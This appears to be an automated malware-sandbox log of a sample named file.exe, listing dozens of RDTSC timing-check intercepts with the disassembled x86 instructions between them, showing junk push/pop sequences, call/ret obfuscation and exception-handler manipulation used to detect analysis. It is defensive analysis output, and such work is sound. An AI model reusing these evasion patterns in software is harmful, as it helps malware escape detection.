Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5EF5 second address: 11F5EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5EF9 second address: 11F5EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F8A7D second address: 11F8A94 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE1472CB5Ch 0x00000008 jng 00007FEE1472CB56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F8A94 second address: 11F8AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FEE1507F275h 0x0000001c popad 0x0000001d popad 0x0000001e pop eax 0x0000001f movsx edi, di 0x00000022 mov edi, dword ptr [ebp+122D2DB4h] 0x00000028 push 4601A04Fh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 jmp 00007FEE1507F276h 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9538 second address: 11F9546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F97F4 second address: 11F97F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F97F8 second address: 11F981A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F981A second address: 11F981E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9909 second address: 11F9923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA07F second address: 11FA08A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEE1507F266h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA08A second address: 11FA08F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA08F second address: 11FA118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FEE1507F268h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 pushad 0x00000023 movzx ecx, dx 0x00000026 call 00007FEE1507F26Ch 0x0000002b mov edx, dword ptr [ebp+122D2B1Ch] 0x00000031 pop ebx 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FEE1507F268h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push 00000000h 0x00000051 call 00007FEE1507F277h 0x00000056 mov si, C59Ch 0x0000005a pop esi 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA118 second address: 11FA11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA11D second address: 11FA127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEE1507F266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B9EFD second address: 11B9F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B9F01 second address: 11B9F13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c js 00007FEE1507F266h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B9F13 second address: 11B9F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD420 second address: 11FD424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FC9C6 second address: 11FC9CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD424 second address: 11FD445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FEE1507F266h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FD445 second address: 11FD44F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEE1472CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FC9CA second address: 11FC9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FDDC1 second address: 11FDE41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FEE1472CB58h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FEE1472CB58h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 call 00007FEE1472CB5Ah 0x00000045 sub edi, 2294E7A4h 0x0000004b pop edi 0x0000004c push 00000000h 0x0000004e mov esi, 199FBD3Ah 0x00000053 xchg eax, ebx 0x00000054 jo 00007FEE1472CB70h 0x0000005a push eax 0x0000005b push edx 0x0000005c push edi 0x0000005d pop edi 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FDB97 second address: 11FDBA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FEE1507F266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FDE41 second address: 11FDE62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FEE1472CB58h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FE8BE second address: 11FE8C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FE8C8 second address: 11FE8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FF3D2 second address: 11FF3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FF3D6 second address: 11FF3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FF3DF second address: 11FF407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FEE1507F27Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FF407 second address: 11FF489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FEE1472CB58h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sbb esi, 42B36974h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FEE1472CB58h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2EF6h], edx 0x0000004c push 00000000h 0x0000004e mov dword ptr [ebp+122D1D55h], ecx 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007FEE1472CB5Ah 0x0000005d jng 00007FEE1472CB56h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12009BE second address: 12009C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FEE1507F266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12024AF second address: 12024B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12024B5 second address: 1202506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d call 00007FEE1507F26Eh 0x00000012 jmp 00007FEE1507F26Eh 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a mov ebx, 012AB1C0h 0x0000001f xchg eax, esi 0x00000020 jns 00007FEE1507F270h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FEE1507F26Bh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FF19B second address: 11FF1AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FF1AD second address: 11FF1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1203588 second address: 120358C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205610 second address: 1205618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205618 second address: 120561E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120561E second address: 1205685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D27B6h], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FEE1507F268h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b movzx edi, bx 0x0000002e or dword ptr [ebp+122D2954h], esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007FEE1507F268h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 movsx ebx, bx 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 jnl 00007FEE1507F266h 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205685 second address: 1205698 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE1472CB58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205698 second address: 120569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120569C second address: 12056A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12056A2 second address: 12056A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120878F second address: 1208807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnp 00007FEE1472CB5Ah 0x0000000d nop 0x0000000e xor ebx, dword ptr [ebp+122D2D64h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FEE1472CB58h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edi, ecx 0x00000032 push 00000000h 0x00000034 jmp 00007FEE1472CB60h 0x00000039 xchg eax, esi 0x0000003a jmp 00007FEE1472CB62h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FEE1472CB63h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1208807 second address: 1208811 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE1507F266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1208811 second address: 120882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120E641 second address: 120E645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120E645 second address: 120E664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEE1472CB65h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12026E6 second address: 12026EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12026EA second address: 12026EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12026EE second address: 12026F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206A0D second address: 1206A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FEE1472CB5Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FEE1472CB56h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12026F4 second address: 12026FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12026FA second address: 12026FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12107D3 second address: 12107D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12107D9 second address: 121084B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bx, 46C1h 0x0000000e mov ebx, dword ptr [ebp+122D2AD8h] 0x00000014 push 00000000h 0x00000016 sub dword ptr [ebp+122D2861h], edx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FEE1472CB58h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov bl, dh 0x0000003a js 00007FEE1472CB5Ah 0x00000040 mov bx, D478h 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 jmp 00007FEE1472CB60h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FEE1472CB5Ah 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121084B second address: 121084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120A991 second address: 120A995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120A995 second address: 120A999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120A999 second address: 120A9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FEE1472CB60h 0x0000000d pushad 0x0000000e je 00007FEE1472CB56h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 mov dword ptr [ebp+122D36A3h], ebx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 sub dword ptr [ebp+122D3583h], eax 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov edi, dword ptr [ebp+122D2A54h] 0x00000038 mov eax, dword ptr [ebp+122D038Dh] 0x0000003e mov edi, dword ptr [ebp+122D2B48h] 0x00000044 push FFFFFFFFh 0x00000046 push edx 0x00000047 mov dword ptr [ebp+122D300Fh], esi 0x0000004d pop ebx 0x0000004e mov dword ptr [ebp+122D3546h], ebx 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120A9F3 second address: 120A9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120C855 second address: 120C86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FEE1472CB5Ch 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D907 second address: 120D99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 or ebx, dword ptr [ebp+122D2CB8h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+1244D789h], eax 0x0000001b movsx ebx, si 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FEE1507F268h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f jne 00007FEE1507F26Ch 0x00000045 mov eax, dword ptr [ebp+122D12A1h] 0x0000004b mov ebx, dword ptr [ebp+122D38B3h] 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007FEE1507F268h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d and edi, dword ptr [ebp+122D1E29h] 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FEE1507F26Fh 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120FA72 second address: 120FA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211A80 second address: 1211A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C245A second address: 11C2460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12197CD second address: 1219816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE1507F275h 0x00000008 jbe 00007FEE1507F266h 0x0000000e jmp 00007FEE1507F26Ah 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007FEE1507F27Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219816 second address: 1219822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEE1472CB56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219822 second address: 1219826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219991 second address: 1219998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F828 second address: 121F82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F82E second address: 121F887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c pop esi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jne 00007FEE1472CB5Ch 0x00000018 jmp 00007FEE1472CB5Ah 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 jp 00007FEE1472CB58h 0x00000027 jo 00007FEE1472CB58h 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FEE1472CB66h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F9C1 second address: 121F9C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121FB05 second address: 121FB5F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE1472CB66h 0x00000008 jmp 00007FEE1472CB60h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FEE1472CB5Dh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007FEE1472CB64h 0x0000001e mov eax, dword ptr [eax] 0x00000020 jp 00007FEE1472CB5Eh 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 rdtsc
